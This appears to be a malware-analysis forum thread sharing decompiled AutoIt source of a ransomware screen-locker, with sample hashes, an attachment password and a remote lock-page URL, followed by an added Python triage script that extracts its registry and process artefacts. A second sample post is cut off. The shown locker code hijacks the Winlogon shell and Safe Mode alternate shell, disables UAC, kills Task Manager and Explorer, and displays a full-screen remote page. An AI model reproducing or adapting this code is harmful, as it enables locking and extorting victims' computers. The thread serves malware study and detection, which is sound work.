Attachments
pass: infected
(366.03 KiB) Downloaded 172 times
Win32:Virut wrote:
Ransom.II
Parts of decompiled AutoIt script. Highlights?
MD5: F74E910C368717E9ACEF3A1B9A1A9F03
Screenshots: https://www.botnets.fr/index.php/Ransom.II
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut3E.tmp
$UNDERGROUND = "brasilia"
$SWISS = "germany"
ProcessClose("iexplore.exe")
ProcessClose("firefox.exe")
$URL = "95.163.104.88/spielberg/start.php"
If @OSVersion = "WIN_7" Or @OSVersion = "WIN_VISTA" Then
If @OSArch = "X64" Then
RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
Else
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
EndIf
EndIf
$ASHELL = RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell")
If $ASHELL <> @ScriptFullPath Then
If @OSVersion <> "WIN_7" Or @OSVersion = "WIN_VISTA" Then
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
EndIf
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell", "REG_SZ", @ScriptFullPath)
RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
$SHELL = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
If $SHELL <> @ScriptFullPath Then
FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & @ScriptName & ".lnk")
EndIf
$OIE = ObjCreate("Shell.Explorer.2")
$HGUI = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $WS_POPUP + $WS_EX_TOOLWINDOW, $WS_EX_LAYERED + $WS_EX_TOPMOST + $WS_EX_TOOLWINDOW)
$GUIACTIVEX = GUICtrlCreateObj($OIE, 0, 0, @DesktopWidth, @DesktopHeight)
GUISetBkColor(1, $HGUI)
GUISetState()
$OIE.navigate($URL)
_WinAPI_SetLayeredWindowAttributes($HGUI, 1, 255, 3)
Local $TIMER, $DIFF
$TIMER = TimerInit()
While 1
$DIFF = TimerDiff($TIMER)
If $DIFF > 150 Then
If ProcessExists("taskmgr.exe") Then
ProcessClose("taskmgr.exe")
EndIf
If ProcessExists("explorer.exe") Then
Run(@ComSpec & " /c " & "taskkill /f /im explorer.exe", "", @SW_HIDE)
EndIf
$DIFF = 0
$TIMER = TimerInit()
EndIf
WinSetOnTop($HGUI, "", 1)
WinActivate($HGUI)
WEnd
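A small static triage helper, added here as an example and not part of the post or of the sample itself: it reads decompiled AutoIt text like the excerpt above and pulls out the persistence registry writes (Winlogon Shell, SafeBoot AlternateShell, EnableLUA, the context-menu policies), the processes the main loop kills, the Startup-folder shortcut and the lock-screen URL, so the post turns into a checklist of host artefacts to hunt for. The regexes, the category labels and the embedded SAMPLE (lines copied from the excerpt above) are this example's own assumptions, not the decompiler's output format.

```python
"""Static triage of a decompiled AutoIt screen-locker excerpt (example code)."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed sample: lines copied from the decompiled excerpt in the post above.
SAMPLE = r'''
ProcessClose("iexplore.exe")
ProcessClose("firefox.exe")
$URL = "95.163.104.88/spielberg/start.php"
RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell", "REG_SZ", @ScriptFullPath)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & @ScriptName & ".lnk")
ProcessClose("taskmgr.exe")
Run(@ComSpec & " /c " & "taskkill /f /im explorer.exe", "", @SW_HIDE)
'''

# Patterns for the AutoIt calls the excerpt uses (assumed shapes, not a full parser).
REG_WRITE = re.compile(r'RegWrite\("([^"]+)"\s*,\s*"([^"]*)"\s*,\s*"([^"]+)"\s*,\s*(.*)\)\s*$')
PROCESS_CLOSE = re.compile(r'ProcessClose\("([^"]+)"\)')
TASKKILL = re.compile(r'taskkill\s+/f\s+/im\s+([\w.\-]+)', re.IGNORECASE)
URL_ASSIGN = re.compile(r'\$URL\s*=\s*"([^"]+)"')
STARTUP_LNK = re.compile(r'FileCreateShortcut\(.*@StartupDir', re.IGNORECASE)

# Registry locations abused by the sample, keyed by (normalised key, value name).
# Labels are this example's own descriptions of what the write achieves.
PERSISTENCE_KEYS = {
    (r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon", "shell"):
        "Winlogon Shell replaced: script starts instead of explorer.exe at logon",
    (r"hkey_local_machine\system\currentcontrolset\control\safeboot", "alternateshell"):
        "Safe Mode alternate shell replaced: lock screen survives safe boot",
    (r"hkey_local_machine\software\microsoft\windows\currentversion\policies\system", "enablelua"):
        "UAC disabled (EnableLUA=0)",
    (r"hkey_local_machine\software\policies\microsoft\internet explorer\restrictions", "nobrowsercontextmenu"):
        "IE context menu disabled (hardens the WebBrowser lock screen)",
    (r"hkey_local_machine\software\microsoft\windows\currentversion\policies\explorer", "noviewcontextmenu"):
        "Explorer context menu disabled",
}


@dataclass
class RegFinding:
    key: str
    value: str
    data: str
    label: str
    explicit_64bit_view: bool  # AutoIt's HKEY_*64 alias forces the 64-bit registry view


@dataclass
class Triage:
    persistence: List[RegFinding] = field(default_factory=list)
    other_registry: List[RegFinding] = field(default_factory=list)
    killed_processes: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)
    startup_shortcut: bool = False


def normalise_key(key: str) -> Tuple[str, bool]:
    """Lower-case the key and fold the HKEY_*64 hive alias into the plain hive name."""
    hive, _, rest = key.partition("\\")
    wow64 = hive.upper().endswith("64")
    if wow64:
        hive = hive[:-2]
    return f"{hive}\\{rest}".lower(), wow64


def triage(script: str) -> Triage:
    """Walk the decompiled text line by line and collect host artefacts to hunt for."""
    t = Triage()
    for raw in script.splitlines():
        line = raw.strip()
        m = REG_WRITE.search(line)
        if m:
            key, value, _reg_type, data = m.groups()
            norm, wow64 = normalise_key(key)
            label = PERSISTENCE_KEYS.get((norm, value.lower()))
            finding = RegFinding(key, value, data.strip().strip('"'), label or "unclassified", wow64)
            (t.persistence if label else t.other_registry).append(finding)
            continue
        for proc in PROCESS_CLOSE.findall(line) + TASKKILL.findall(line):
            if proc.lower() not in t.killed_processes:
                t.killed_processes.append(proc.lower())
        for url in URL_ASSIGN.findall(line):
            if url not in t.urls:
                t.urls.append(url)
        if STARTUP_LNK.search(line):
            t.startup_shortcut = True
    return t


if __name__ == "__main__":
    result = triage(SAMPLE)
    for f in result.persistence:
        view = " [64-bit view]" if f.explicit_64bit_view else ""
        print(f"{f.key}\\{f.value} = {f.data}{view}\n    {f.label}")
    print("killed processes:", ", ".join(result.killed_processes))
    print("lock-screen URL(s):", ", ".join(result.urls))
    print("Startup-folder shortcut:", result.startup_shortcut)
```

Running it against the embedded sample yields four classified persistence writes, the four process names the loop terminates, the single URL and the Startup shortcut; on a real host the same key/value pairs are what to compare against their defaults (Shell should read explorer.exe, AlternateShell cmd.exe, EnableLUA 1) when checking whether a machine was touched by this family.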
Win32:Virut wrote:
Ransom.II
Lots of interesting code in this one IMO. I just picked a small amount so it doesn't lag the thread.
MD5: 82B192B07B32D0E77B1F2B21F17283E6
https://www.virustotal.com/file/edd206f ... /analysis/
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut7B.tmp
If FileExists(@AppDataDir & "1.exe") Then
$HAFTBEFEHLAAT = "haftbefehlaat"
$URL = "95.163.104.87/aff14/start.php"